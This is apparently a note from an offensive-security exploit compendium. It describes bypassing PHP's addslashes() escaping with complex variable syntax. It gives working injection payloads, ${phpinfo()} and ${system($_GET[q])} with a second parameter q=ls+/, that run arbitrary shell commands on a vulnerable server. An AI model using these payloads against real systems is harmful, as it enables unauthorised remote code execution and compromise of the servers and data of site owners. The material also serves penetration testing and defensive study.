killchain-compendium/Exploits/Web/PHP addslashes Bypass.md

Bypass addslashes()

The function addslashes() can be bypassed by using complex variables like ${VARIABLE}, for example ${phpinfo()} or using a second HTTP parameter for input via

${system($_GET[q])}&q=ls+/

• https://www.programmersought.com/article/30723400042/